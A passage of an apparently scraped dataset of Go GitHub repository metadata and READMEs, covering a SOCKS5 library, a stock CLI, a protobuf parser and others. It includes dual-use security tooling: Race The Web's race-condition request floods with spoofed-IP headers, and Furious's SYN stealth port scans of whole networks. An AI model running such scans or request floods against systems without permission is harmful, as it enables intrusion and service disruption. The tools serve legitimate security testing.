net.Conn\n\n* `type Client struct`\n\nExample:\n\n```\nclient, _ := 
socks5.NewClient(server, username, password, tcpTimeout, udpTimeout)\nconn, _ := client.Dial(network, addr)\n```\n\n\n### Who is using this project\n\n- Brook: https://github.com/txthinking/brook\n- Shiliew: https://www.txthinking.com/shiliew.html\n- dismap: https://github.com/zhzyker/dismap\n- emp3r0r: https://github.com/jm33-m0/emp3r0r\n- hysteria: https://github.com/apernet/hysteria\n- mtg: https://github.com/9seconds/mtg\n- trojan-go: https://github.com/p4gefau1t/trojan-go\n\n## License\n\nOpen sourced under the MIT License\n", "readme_type": "markdown", "hn_comments": "Next time someone says to me that language's popularity doesn't matter for it's utility, I'll remember how Go's socks library appears on the front page of HN, while my pull request the Haskell's socks library (which implements the most basic feature that author added to the top of TODO list himself) is sitting unmerged and uncommented now for almost a year.(1) (If I sound bitter it's because I am.)Seriously though, such \"boring\" libraries that you just need in your toolbox are a great way to evaluate the health of the whole ecosystem.[1][https://github.com/vincenthz/hs-socks/pull/24]If I only want the client side, does this add anything over https://godoc.org/golang.org/x/net/proxy ?Honest question: What do people use Socks for? Personally I haven't used it since Firesheep...Last time I needed a SOCKS5 server + client in Go, I remember using github.com/getlantern/go-socks5. What does this offer above that?I will always say this was a complete hack to a specific time in history. Having SOCKS in your toolbelt of tricks is always handy and can make hard things surprisingly easy.Last time was I needed to tunnel a request from my development environment into a production VPN to contact a service which had IP access restrictions.On Firefox, your footer is very difficult to read. The font is too light on the background. Hope it is not intentional.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ericm/stonks", "link": "https://github.com/ericm/stonks", "tags": ["stock-market", "stock-data", "stocks", "stock-cli", "cli", "stock-market-data", "terminal-graphics", "go", "golang", "linux", "macos", "graphs", "tracker", "aur", "stock-visualizer", "wtfutil", "curl", "ascii-art", "terminal-based", "hacktoberfest"], "stars": 522, "description": "Stonks is a terminal based stock visualizer and tracker that displays realtime stocks in graph format in a terminal. See how fast your stonks will crash.", "lang": "Go", "repo_lang": "", "readme": "# ![Stonks](./assets/stonks.svg?raw=true)\n\n[![GitHub](https://img.shields.io/github/license/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/blob/master/LICENSE)\n[![GitHub contributors](https://img.shields.io/github/contributors/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/graphs/contributors)\n[![GitHub last commit](https://img.shields.io/github/last-commit/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/commits/master)\n[![GitHub release (latest by date)](https://img.shields.io/github/v/release/ericm/stonks?style=for-the-badge)](https://github.com/ericm/stonks/releases)\n[![AUR version](https://img.shields.io/aur/version/stonks?style=for-the-badge)](https://aur.archlinux.org/packages/stonks/)\n\nStonks is a terminal based stock visualizer and tracker.\n\n## Installation\n\nRequirements: golang >= 1.13\n\n### Manual\n\n1. Clone the repo\n2. 
Run `make && make install`\n\n### Packages\n\nStonks is available on:\n\n- [The AUR](https://aur.archlinux.org/packages/stonks/). You can install it on arch linux with my other project [yup](https://github.com/ericm/yup): `$ yup -S stonks`\n\n- HomeBrew: `brew install ericm/stonks/stonks`\n\n### Binaries\n\nBinaries are now available for Windows, MacOSX and Linux under each [release](https://github.com/ericm/stonks/releases)\n\n## [Online installationless usage (via curl)](http://stonks.icu)\n\nYou can now access basic stock graphs for passed stock tickers via the stonks HTTPS client (https://stonks.icu).\n\nTry it:\n```\n$ curl -L stonks.icu/amd/ba\n```\n\n## Usage\n\nIt uses Yahoo Finance as a backend so use the ticker format as seen on their website.\n\n```\nDisplays realtime stocks in graph format in a terminal\n\nUsage:\n stonks [flags]\n\nFlags:\n -d, --days int 24 hour period of stocks from X of days ago.\n -e, --extra Include extra pre + post time. (Only works for day)\n -h, --help help for stonks\n -i, --interval string stonks -i X[m|h] (eg 15m, 5m, 1h, 1d) (default \"15m\")\n -n, --name string Optional name for a stonk save\n -r, --remove string Remove an item from favourites\n -s, --save string Add an item to the default stonks command. (Eg: -s AMD -n \"Advanced Micro Devices\")\n -t, --theme string Display theme for the chart (Options: \"line\", \"dot\", \"icon\")\n -v, --version stonks version\n -w, --week Display the last week (will set interval to 1d)\n -y, --year Display the last year (will set interval to 5d)\n --ytd Display the year to date (will set interval to 5d)\n```\n\n### `$ stonks`\n\nGives graphs and current value/change of _saved_ stocks.\n![Stonks](./assets/1.png)\n\n### `$ stonks -s AMD -n \"Advanced Micro Devices\"`\n\nAdd a favourite stock to be tracked with `$ stonks`\n\n### `$ stonks -r AMD`\n\nRemove a favourite stock\n\n### `$ stonks AMD`\n\nGives the current stock for each ticker passed that day\n\n![Stonks](./assets/2.png)\n\n### `$ stonks -w AMD`\n\nGives the current stock for each ticker passed _for the past week_\n\n![Stonks](./assets/3.png)\n\n### `$ stonks -d 4 AMD`\n\nGives the current stock for each ticker passed X days ago\n\n![Stonks](./assets/4.png)\n\n## Configuration\n\nThe config file is located at `~/.config/stonks.yml`\n\nYou can change the following options:\n\n```yml\nconfig:\n default_theme: 0 # 0: Line, 1: Dots, 2: Icons\n favourites_height: 12 # Height of the chart in each info panel\n standalone_height: 12\n```\n\n## Usage with wtfutil\n\nYou can use a program such as [wtfutil](https://wtfutil.com/) (On Arch Linux: `yup -S wtfutil`) to make stonks refresh automatically.\nSee the sample `~/.config/wtf/config.yml` provided by [Gideon Wolfe\n](https://github.com/GideonWolfe):\n\n```yml\nwtf:\n colors:\n background: black\n border:\n focusable: darkslateblue\n focused: blue\n normal: gray\n checked: yellow\n highlight:\n fore: black\n back: gray\n rows:\n even: yellow\n odd: white\n grid:\n # How _wide_ the columns are, in terminal characters. In this case we have\n # four columns, each of which are 35 characters wide.\n columns: [33, 33, 33]\n # How _high_ the rows are, in terminal lines. 
In this case we have four rows\n # that support ten line of text and one of four.\n rows: [20, 20, 20, 20, 20, 20, 20, 20]\n refreshInterval: 1\n\n mods:\n tech:\n type: cmdrunner\n args: [\"tsla\", \"intc\", \"--theme\", \"dot\"]\n cmd: \"stonks\"\n enabled: true\n position:\n top: 0\n left: 0\n height: 2\n width: 3\n refreshInterval: 10\n title: \"\ud83e\udd16 Tech\"\n financial:\n type: cmdrunner\n args: [\"jpm\", \"v\", \"--theme\", \"dot\"]\n cmd: \"stonks\"\n enabled: true\n position:\n top: 2\n left: 0\n height: 2\n width: 3\n refreshInterval: 10\n```\n", "readme_type": "markdown", "hn_comments": "?? Seems locked from read as well> You need permission; Want in? Ask for access, or switch to an account with permission.It was changed to a read only link, not sure why. I'd have appreciated addition from the HN folksLeverage should be a column as many companies that are highly levered will not have the resources to outlast this crisis.Interesting sheet.Might be useful to also add columns to show the current PE and also the market vs book value.Actual remarks by Boston Fed's Rosengren here:https://www.bostonfed.org/news-and-events/speeches/2019/asse...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "emicklei/proto", "link": "https://github.com/emicklei/proto", "tags": ["protobuf", "parser", "proto3", "formatter", "proto2", "golang-package", "protocol-buffers", "protobuf-parser"], "stars": 522, "description": "parser for Google ProtocolBuffers definition", "lang": "Go", "repo_lang": "", "readme": "# proto\n\n[![Build Status](https://api.travis-ci.com/emicklei/proto.svg?branch=master)](https://travis-ci.com/github/emicklei/proto)\n[![Go Report Card](https://goreportcard.com/badge/github.com/emicklei/proto)](https://goreportcard.com/report/github.com/emicklei/proto)\n[![GoDoc](https://pkg.go.dev/badge/github.com/emicklei/proto)](https://pkg.go.dev/github.com/emicklei/proto)\n[![codecov](https://codecov.io/gh/emicklei/proto/branch/master/graph/badge.svg)](https://codecov.io/gh/emicklei/proto)\n\nPackage in Go for parsing Google Protocol Buffers [.proto files version 2 + 3](https://developers.google.com/protocol-buffers/docs/reference/proto3-spec)\n\n### install\n\n go get -u -v github.com/emicklei/proto\n\n### usage\n\n\tpackage main\n\n\timport (\n\t\t\"fmt\"\n\t\t\"os\"\n\n\t\t\"github.com/emicklei/proto\"\n\t)\n\n\tfunc main() {\n\t\treader, _ := os.Open(\"test.proto\")\n\t\tdefer reader.Close()\n\n\t\tparser := proto.NewParser(reader)\n\t\tdefinition, _ := parser.Parse()\n\n\t\tproto.Walk(definition,\n\t\t\tproto.WithService(handleService),\n\t\t\tproto.WithMessage(handleMessage))\n\t}\n\n\tfunc handleService(s *proto.Service) {\n\t\tfmt.Println(s.Name)\n\t}\n\n\tfunc handleMessage(m *proto.Message) {\n\t\tlister := new(optionLister)\n\t\tfor _, each := range m.Elements {\n\t\t\teach.Accept(lister)\n\t\t}\n\t\tfmt.Println(m.Name)\n\t}\n\n\ttype optionLister struct {\n\t\tproto.NoopVisitor\n\t}\n\n\tfunc (l optionLister) VisitOption(o *proto.Option) {\n\t\tfmt.Println(o.Name)\n\t}\n\n### validation\n\nCurrent parser implementation is not completely validating `.proto` definitions.\nIn many but not all cases, the parser will report syntax errors when reading unexpected charaters or tokens.\nUse some linting tools (e.g. 
https://github.com/uber/prototool) or `protoc` for full validation.\n\n### contributions\n\nSee [proto-contrib](https://github.com/emicklei/proto-contrib) for other contributions on top of this package such as protofmt, proto2xsd and proto2gql.\n[protobuf2map](https://github.com/emicklei/protobuf2map) is a small package for inspecting serialized protobuf messages using its `.proto` definition.\n\n\u00a9 2017-2022, [ernestmicklei.com](http://ernestmicklei.com). MIT License. Contributions welcome.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubernetes-sigs/kwok", "link": "https://github.com/kubernetes-sigs/kwok", "tags": ["k8s-sig-scheduling", "kubernetes", "simulator", "docker", "golang", "mulit-cluster", "nerdctl"], "stars": 523, "description": "Kubernetes WithOut Kubelet - Simulates thousands of Nodes and Clusters.", "lang": "Go", "repo_lang": "", "readme": "# `KWOK` (`K`ubernetes `W`ith`O`ut `K`ubelet)\n\n\n\n[KWOK] is a toolkit that enables setting up a cluster of thousands of Nodes in seconds.\nUnder the scene, all Nodes are simulated to behave like real ones, so the overall approach employs\na pretty low resource footprint that you can easily play around on your laptop.\n\nSo far we provide two tools:\n\n- **kwok:** Core of this repo. It simulates thousands of fake Nodes.\n- **kwokctl:** A CLI to facilitate creating and managing clusters simulated by Kwok.\n\nPlease see [our website] for more in-depth information.\n\n\n\n## Community\n\nSee our own [contributor guide] and the Kubernetes [community page].\n\n### Code of conduct\n\nParticipation in the Kubernetes community is governed by the [Kubernetes Code of Conduct][code of conduct].\n\n[KWOK]: https://sigs.k8s.io/kwok\n[our website]: https://kwok.sigs.k8s.io\n[community page]: https://kubernetes.io/community/\n[contributor guide]: https://kwok.sigs.k8s.io/docs/contributing/getting-started\n[code of conduct]: https://github.com/kubernetes-sigs/kwok/blob/main/code-of-conduct.md\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TheHackerDev/race-the-web", "link": "https://github.com/TheHackerDev/race-the-web", "tags": ["security-tools", "race-conditions", "security", "appsec", "devops-tools", "infosec"], "stars": 521, "description": "Tests for race conditions in web applications. Includes a RESTful API to integrate into a continuous integration pipeline.", "lang": "Go", "repo_lang": "", "readme": "[![Go Report Card](https://goreportcard.com/badge/github.com/aaronhnatiw/race-the-web)](https://goreportcard.com/report/github.com/aaronhnatiw/race-the-web) [![Build Status](https://travis-ci.org/aaronhnatiw/race-the-web.svg?branch=master)](https://travis-ci.org/aaronhnatiw/race-the-web)\n\n# Race The Web (RTW)\n\nTests for race conditions in web applications by sending out a user-specified number of requests to a target URL (or URLs) *simultaneously*, and then compares the responses from the server for uniqueness. Includes a number of configuration options.\n\n## UPDATE: Now CI Compatible!\n\nVersion 2.0.0 now makes it easier than ever to integrate RTW into your continuous integration pipeline (\u00e0 la [Jenkins](https://jenkins.io/), [Travis](https://travis-ci.org/), or [Drone](https://github.com/drone/drone)), through the use of an easy to use HTTP API. 
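As a rough sketch of what driving that API from a CI job could look like, here is a minimal Go program (not part of this repository; it assumes an instance is already listening on 127.0.0.1:8000 as in the examples below, and uses the `/set/config` and `/start` endpoints described under Usage):

```go
package main

import (
	"bytes"
	"fmt"
	"io"
	"net/http"
)

func main() {
	// Test configuration in the same JSON shape shown in the Usage section below.
	config := []byte(`{
	  "count": 100,
	  "verbose": false,
	  "requests": [
	    {
	      "method": "POST",
	      "url": "http://racetheweb.io/bank/withdraw",
	      "cookies": ["sessionId=<insert here>"],
	      "body": "amount=1",
	      "redirects": true
	    }
	  ]
	}`)

	// Push the configuration to the locally running race-the-web instance.
	resp, err := http.Post("http://127.0.0.1:8000/set/config", "application/json", bytes.NewReader(config))
	if err != nil {
		panic(err)
	}
	resp.Body.Close()

	// Kick off the race condition test; findings come back as JSON.
	resp, err = http.Post("http://127.0.0.1:8000/start", "application/json", nil)
	if err != nil {
		panic(err)
	}
	defer resp.Body.Close()

	findings, err := io.ReadAll(resp.Body)
	if err != nil {
		panic(err)
	}
	fmt.Println(string(findings))
}
```

A CI job would typically parse the returned findings and fail the pipeline when duplicate side effects (for example, more unique responses than expected) show up.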
More information can be found in the **Usage** section below.\n\n## Watch The Talk\n\n[![Racing the Web - Hackfest 2016](https://img.youtube.com/vi/4T99v957I0o/0.jpg)](https://www.youtube.com/watch?v=4T99v957I0o)\n\n_Racing the Web - Hackfest 2016_\n\nSlides: https://www.slideshare.net/AaronHnatiw/racing-the-web-hackfest-2016\n\n## Usage\n\nWith configuration file\n\n```sh\n$ race-the-web config.toml\n```\n\nAPI\n\n```sh\n$ race-the-web\n```\n\n### Configuration File\n\n**Example configuration file included (_config.toml_):**\n\n```toml\n# Sample Configurations\n\n# Send 100 requests to each target\ncount = 100\n# Enable verbose logging\nverbose = true\n# Use an http proxy for all connections\nproxy = \"http://127.0.0.1:8080\"\n\n# Specify the first request\n[[requests]]\n # Use the GET request method\n method = \"GET\"\n # Set the URL target. Any valid URL is accepted, including ports, https, and parameters.\n url = \"https://example.com/pay?val=1000\"\n # Set the request body.\n # body = \"body=text\"\n # Set the cookie values to send with the request to this target. Must be an array.\n cookies = [\"PHPSESSIONID=12345\",\"JSESSIONID=67890\"]\n # Set custom headers to send with the request to this target. Must be an array.\n headers = [\"X-Originating-IP: 127.0.0.1\", \"X-Remote-IP: 127.0.0.1\"]\n # Follow redirects\n redirects = true\n\n# Specify the second request\n[[requests]]\n # Use the POST request method\n method = \"POST\"\n # Set the URL target. Any valid URL is accepted, including ports, https, and parameters.\n url = \"https://example.com/pay\"\n # Set the request body.\n body = \"val=1000\"\n # Set the cookie values to send with the request to this target. Must be an array.\n cookies = [\"PHPSESSIONID=ABCDE\",\"JSESSIONID=FGHIJ\"]\n # Set custom headers to send with the request to this target. Must be an array.\n headers = [\"X-Originating-IP: 127.0.0.1\", \"X-Remote-IP: 127.0.0.1\"]\n # Do not follow redirects\n redirects = false\n```\n\nTOML Spec: https://github.com/toml-lang/toml\n\n### API\n\nSince version 2.0.0, RTW now has a full-featured API, which allows you to easily integrate it into your continuous integration (CI) tool of choice. This means that you can quickly and easily test your web application for race conditions automatically whenever you commit your code.\n\nThe API works through a simple set of HTTP calls. You provide input in the form of JSON and receive a response in JSON. The 3 API endpoints are as follows:\n\n- `POST` `http://127.0.0.1:8000/set/config`: Provide configuration data (in JSON format) for the race condition test you want to run (examples below).\n- `GET` `http://127.0.0.1:8000/get/config`: Fetch the current configuration data. Data is returned in a JSON response.\n- `POST` `http://127.0.0.1:8000/start`: Begin the race condition test using the configuration that you have already provided. All findings are returned back in JSON output.\n\n#### Example JSON configuration (sent to `/set/config` using a `POST` request)\n\n```json\n{\n \"count\": 100,\n \"verbose\": false,\n \"requests\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"cookies\": [\n \"sessionId=dutwJx8kyyfXkt9tZbboT150TjZoFuEZGRy8Mtfpfe7g7UTPybCZX6lgdRkeOjQA\"\n ],\n \"body\": \"amount=1\",\n \"redirects\": true\n }\n ]\n}\n```\n\n#### Example workflow using curl\n\n\n1. 
Send the configuration data\n\n```sh\n$ curl -d '{\"count\":100,\"verbose\":false,\"requests\":[{\"method\":\"POST\",\"url\":\"http://racetheweb.io/bank/withdraw\",\"cookies\":[\"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"],\"body\":\"amount=1\",\"redirects\":true}]}' -H \"Content-Type: application/json\" -X POST http://127.0.0.1:8000/set/config\n\n{\"message\":\"configuration saved\"}\n```\n\n2. Retrieve the configuration data for validation\n\n```sh\n$ curl -X GET http://127.0.0.1:8000/get/config\n\n{\"count\":100,\"verbose\":false,\"proxy\":\"\",\"requests\":[{\"method\":\"POST\",\"url\":\"http://racetheweb.io/bank/withdraw\",\"body\":\"amount=1\",\"cookies\":[\"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"],\"headers\":null,\"redirects\":true}]}\n```\n\n3. Start the race condition test\n\n```sh\n$ curl -X POST http://127.0.0.1:8000/start\n```\n\nResponse (expanded for visibility):\n\n```JSON\n[\n {\n \"Response\": {\n \"Body\": \"\\n\\n\\n \\n \\n \\n \\n \\n Bank Test\\n\\n \\n \\n\\n \\n \\n \\n\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\\n
                    [ ... full HTML of the demo bank page omitted; the rendered page shows 'Welcome to SpeedBank, International', 'You have successfully withdrawn $1', 'Balance: 9999', and the demo instructions ... ]
\\n \\n \\n \\n \\n \\n \\n \\n\\n\",\n \"StatusCode\": 200,\n \"Length\": -1,\n \"Protocol\": \"HTTP/1.1\",\n \"Headers\": {\n \"Content-Type\": [\n \"text/html; charset=utf-8\"\n ],\n \"Date\": [\n \"Fri, 18 Aug 2017 15:36:29 GMT\"\n ]\n },\n \"Location\": \"\"\n },\n \"Targets\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"body\": \"amount=1\",\n \"cookies\": [\n \"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"\n ],\n \"headers\": null,\n \"redirects\": true\n }\n ],\n \"Count\": 1\n },\n {\n \"Response\": {\n \"Body\": \"\\n\\n\\n \\n \\n \\n \\n \\n Bank Test\\n\\n \\n \\n\\n \\n \\n \\n\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\\n
                    [ ... full HTML of the demo bank page omitted; identical to the first response except for 'Balance: 9998' ... ]
\\n \\n \\n \\n \\n \\n \\n \\n\\n\",\n \"StatusCode\": 200,\n \"Length\": -1,\n \"Protocol\": \"HTTP/1.1\",\n \"Headers\": {\n \"Content-Type\": [\n \"text/html; charset=utf-8\"\n ],\n \"Date\": [\n \"Fri, 18 Aug 2017 15:36:30 GMT\"\n ]\n },\n \"Location\": \"\"\n },\n \"Targets\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"body\": \"amount=1\",\n \"cookies\": [\n \"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"\n ],\n \"headers\": null,\n \"redirects\": true\n }\n ],\n \"Count\": 1\n },\n {\n \"Response\": {\n \"Body\": \"\\n\\n\\n \\n \\n \\n \\n \\n Bank Test\\n\\n \\n \\n\\n \\n \\n \\n\\n \\n \\n \\n \\n \\n \\n \\n \\n \\n \\n\\n
                    [ ... full HTML of the demo bank page omitted; identical to the first response except for 'Balance: 9997' ... ]
\\n \\n \\n \\n \\n \\n \\n \\n\\n\",\n \"StatusCode\": 200,\n \"Length\": -1,\n \"Protocol\": \"HTTP/1.1\",\n \"Headers\": {\n \"Content-Type\": [\n \"text/html; charset=utf-8\"\n ],\n \"Date\": [\n \"Fri, 18 Aug 2017 15:36:36 GMT\"\n ]\n },\n \"Location\": \"\"\n },\n \"Targets\": [\n {\n \"method\": \"POST\",\n \"url\": \"http://racetheweb.io/bank/withdraw\",\n \"body\": \"amount=1\",\n \"cookies\": [\n \"sessionId=Ay2jnxL2TvMnBD2ZF-5bXTXFEldIIBCpcS4FLB-5xjEbDaVnLbf0pPME8DIuNa7-\"\n ],\n \"headers\": null,\n \"redirects\": true\n }\n ],\n \"Count\": 98\n }\n]\n```\n\n## Binaries\n\nThe program has been written in Go, and as such can be compiled to all the common platforms in use today. The following architectures have been compiled, and can be found in the [releases](https://github.com/insp3ctre/race-the-web/releases) tab:\n\n- Windows amd64\n- Windows 386\n- Linux amd64\n- Linux 386\n- OSX amd64\n- OSX 386\n\n## Compiling\n\nFirst, make sure you have Go installed on your system. If you don't you can follow the install instructions for your operating system of choice here: https://golang.org/doc/install.\n\nBuild a binary for your current CPU architecture\n\n```sh\n$ make build\n```\n\nBuild for all major CPU architectures (see [Makefile](https://github.com/insp3ctre/race-the-web/blob/master/Makefile) for details) at once\n\n```sh\n$ make\n```\n\n### Dep\n\nThis project uses [Dep](https://github.com/golang/dep) for dependency management. All of the required files are kept in the `vendor` directory, however if you are getting errors related to dependencies, simply download Dep\n\n```sh\n$ go get -u github.com/golang/dep/cmd/dep\n```\n\nand run the following command from the RTW directory in order to download all dependencies\n\n```sh\n$ dep ensure\n```\n\n### Go 1.7 and newer are supported\n\nBefore 1.7, the `encoding/json` package's `Encoder` did not have a method to escape the `&`, `<`, and `>` characters; this is required in order to have a clean output of full HTML pages when running these race tests. _If this is an issue for your test cases, please submit a [new issue](https://github.com/insp3ctre/race-the-web/issues) indicating as such, and I will add a workaround (just note that any output from a server with those characters will come back with unicode escapes instead)._ Here are the relevant release details from Go 1.7: https://golang.org/doc/go1.7#encoding_json.\n\n## The Vulnerability\n\n> A race condition is a flaw that produces an unexpected result when the timing of actions impact other actions. An example may be seen on a multithreaded application where actions are being performed on the same data. Race conditions, by their very nature, are difficult to test for.\n> - [OWASP](https://www.owasp.org/index.php/Testing_for_Race_Conditions_(OWASP-AT-010))\n\nRace conditions are a well known issue in software development, especially when you deal with fast, multi-threaded languages.\n\nHowever, as network speeds get faster and faster, web applications are becoming increasingly vulnerable to race conditions. Often because of legacy code that was not created to handle hundreds or thousands of simultaneous requests for the same function or resource.\n\nThe problem can often only be discovered when a fast, multi-threaded language is being used to generate these requests, using a fast network connection; at which point it becomes a network and logic race between the client application and the server application.\n\nThat is where **Race The Web** comes in. 
This program aims to discover race conditions in web applications by sending a large amount of requests to a specific endpoint at the same time. By doing so, it may invoke unintended behaviour on the server, such as the duplication of user information, coupon codes, bitcoins, etc.\n\n**Warning:** Denial of service may be an unintended side-effect of using this application, so please be careful when using it, and always perform this kind of testing with the explicit permission of the server owner and web application owner.\n\nCredit goes to [Josip Franjkovi\u0107](https://twitter.com/josipfranjkovic) for his [excellent article on the subject](https://www.josipfranjkovic.com/blog/race-conditions-on-web), which introduced me to this problem.\n\n## Why Go\n\nThe [Go programming language](https://golang.org/) is perfectly suited for the task, mainly because it is *so damned fast*. Here are a few reasons why:\n\n- Concurrency: Concurrency primitives are built into the language itself, and extremely easy to add to any Go program. Threading is [handled by the Go runtime scheduler](https://morsmachine.dk/go-scheduler), and not by the underlying operating system, which allows for some serious performance optimizations when it comes to concurrency.\n- Compiled: *Cross-compiles* to [most modern operating systems](https://golang.org/doc/install/source#environment); not slowed down by an interpreter or virtual machine middle-layer ([here are some benchmarks vs Java](https://benchmarksgame.alioth.debian.org/u64q/go.html)). (Oh, and did I mention that the binaries are statically compiled?)\n- Lightweight: Only [25 keywords](https://golang.org/ref/spec#Keywords) in the language, and yet still almost everything can be done using the standard library.\n\nFor more of the nitty-gritty details on why Go is so fast, see [Dave Cheney](https://twitter.com/davecheney)'s [excellent talk on the subject](http://dave.cheney.net/2014/06/07/five-things-that-make-go-fast), from 2014.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "serialx/hashring", "link": "https://github.com/serialx/hashring", "tags": [], "stars": 524, "description": "Consistent hashing \"hashring\" implementation in golang (using the same algorithm as libketama)", "lang": "Go", "repo_lang": "", "readme": "hashring\n============================\n\nImplements consistent hashing that can be used when\nthe number of server nodes can increase or decrease (like in memcached).\nThe hashing ring is built using the same algorithm as libketama.\n\nThis is a port of Python hash_ring library \nin Go with the extra methods to add and remove nodes.\n\n\nUsing\n============================\n\nImporting ::\n\n```go\nimport \"github.com/serialx/hashring\"\n```\n\nBasic example usage ::\n\n```go\nmemcacheServers := []string{\"192.168.0.246:11212\",\n \"192.168.0.247:11212\",\n \"192.168.0.249:11212\"}\n\nring := hashring.New(memcacheServers)\nserver, _ := ring.GetNode(\"my_key\")\n```\n\nTo fulfill replication requirements, you can also get a list of servers that should store your key.\n```go\nserversInRing := []string{\"192.168.0.246:11212\",\n \"192.168.0.247:11212\",\n \"192.168.0.248:11212\",\n \"192.168.0.249:11212\",\n \"192.168.0.250:11212\",\n \"192.168.0.251:11212\",\n \"192.168.0.252:11212\"}\n\nreplicaCount := 3\nring := hashring.New(serversInRing)\nserver, _ := ring.GetNodes(\"my_key\", replicaCount)\n```\n\nUsing weights example ::\n\n```go\nweights := 
make(map[string]int)\nweights[\"192.168.0.246:11212\"] = 1\nweights[\"192.168.0.247:11212\"] = 2\nweights[\"192.168.0.249:11212\"] = 1\n\nring := hashring.NewWithWeights(weights)\nserver, _ := ring.GetNode(\"my_key\")\n```\n\nAdding and removing nodes example ::\n\n```go\nmemcacheServers := []string{\"192.168.0.246:11212\",\n \"192.168.0.247:11212\",\n \"192.168.0.249:11212\"}\n\nring := hashring.New(memcacheServers)\nring = ring.RemoveNode(\"192.168.0.246:11212\")\nring = ring.AddNode(\"192.168.0.250:11212\")\nserver, _ := ring.GetNode(\"my_key\")\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "liamg/furious", "link": "https://github.com/liamg/furious", "tags": ["port-scanner", "ip-scanner", "network-scanner", "security"], "stars": 524, "description": ":angry: Go IP/port scanner with SYN (stealth) scanning and device manufacturer identification", "lang": "Go", "repo_lang": "", "readme": "# Furious IP/Port Scanner\n\nFurious is a fast, lightweight, portable network scanner.\n\n![Screenshot 1](./screenshot.png)\n![Screenshot 2](./screenshot2.png)\n\nI haven't done any proper performance testing, but a SYN scan of a single host, including all known ports (~6000) will typically take in the region of 4 seconds. On the same machine, nmap took 98 seconds and produced exactly the same results.\n\n## Install\n\nYou'll need to install libpcap.\n\n- On Linux, install `libpcap` with your package manager\n- On OSX, `brew install libpcap`\n- On Windows, install [WinPcap](https://www.winpcap.org/)\n\nThen just:\n\n```\ngo get -u github.com/liamg/furious\n```\n\n## Options\n\n### `-s [TYPE]` `--scan-type [TYPE]`\n\nUse the specified scan type. The options are:\n\n| Type | Description |\n|------------|-------------|\n| `syn` | A SYN/stealth scan. Most efficient scan type, using only a partial TCP handshake. Requires root privileges.\n| `connect` | A less detailed scan using full TCP handshakes, though does not require root privileges. \n| `device` | Attempt to identify device MAC address and manufacturer where possible. Useful for listing devices on a LAN.\n\nThe default is a SYN scan.\n\n### `-p [PORTS]` `--ports [PORTS]`\n\nScan the specified ports. Defaults to a list of all known ports as [provided by IANA](https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml).\n\nPorts may be specified using a comma delimited list, and ranges are also allowed.\n\nFor example:\n\n```\n--ports 22,80,443,8080-8082\n```\n\n...will scan 22, 80, 443, 8080, 8081, and 8082.\n\n### `-t [MS]` `--timout-ms [MS]`\n\nThe network timeout to apply to each port being checked. Default is *1000ms*.\n\n### `-w [COUNT]` `--workers [COUNT]`\n\nThe number of worker routines to use to scan ports in parallel. 
Default is *1000* workers.\n\n### `-u` `--up-only`\n\nOnly show output for hosts that are confirmed as up.\n\n### `--version`\n\nOutput version information and exit.\n\n## Usage\n\nFurious can be used to:\n\n### Find open ports on one or more hosts\n\nScan a single host:\n```\nfurious 192.168.1.4 \n```\n\nScan a whole CIDR:\n```\nfurious 192.168.1.0/24 \n```\n\n### Scan a mixture of IPs, hostnames and CIDRs\n\n```\nfurious -s connect 8.8.8.8 192.168.1.1/24 google.com\n```\n\n### Run a SYN (stealth) scan (with root privileges)\n\n```\nsudo -E furious -s syn 192.168.1.1\n```\n\n### Run a connect scan as any user\n\n```\nfurious -s connect 192.168.1.1\n```\n\n### Identify device MAC address and manufacturer within a local network\n\n```\nfurious -s device 192.168.1.1/24 -u\n```\n\n## Troubleshooting\n\n### `sudo: furious: command not found`\n\nIf you installed using go, your user has the environment variables required to locate go programs, but root does not. You need to:\n\n```\nsudo env \"PATH=$PATH\" furious\n```\n\n## SYN/Connect scans are slower than nmap!\n\nThey're not in my experience, but with default arguments furious scans nearly six times as many ports as nmap does by default.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jonmorehouse/terraform-provisioner-ansible", "link": "https://github.com/jonmorehouse/terraform-provisioner-ansible", "tags": [], "stars": 524, "description": "A provisioner for bootstrapping terraform resources with ansible", "lang": "Go", "repo_lang": "", "readme": "# terraform-provisioner-ansible\n> Provision terraform resources with ansible\n\n## Overview\n\n**[Terraform](https://github.com/hashicorp/terraform)** is a tool for automating infrastructure. Terraform includes the ability to provision resources at creation time through a plugin api. Currently, some builtin [provisioners](https://www.terraform.io/docs/provisioners/) such as **chef** and standard scripts are provided; this provisioner introduces the ability to provision an instance at creation time with **ansible**.\n\nThis provisioner provides the ability to apply **host-groups**, **plays** or **roles** against a host at provision time. Ansible is run on the host itself and this provisioner configures a dynamic inventory on the fly as resources are created.\n\n**terraform-provisioner-ansible** is shipped as a **Terraform** 